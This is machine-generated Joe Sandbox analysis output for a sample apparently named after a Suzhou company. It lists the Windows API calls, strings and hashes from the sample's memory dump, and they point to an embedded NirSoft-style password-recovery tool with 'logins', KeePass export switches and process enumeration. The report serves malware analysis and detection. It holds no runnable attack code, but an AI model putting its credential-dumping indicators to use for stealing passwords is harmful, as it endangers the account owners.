                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                    • String ID: logins$null
                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID: ---
                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1010922700-0
                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2012295524-70141382
                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1700100422-0
                                                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 552707033-0
                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                    • String ID: 4$h
                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: %%0.%df
                                                                                                    • API String ID: 3473751417-763548558
                                                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                    • String ID: A
                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                    APIs
                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 973020956-4135340389
                                                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
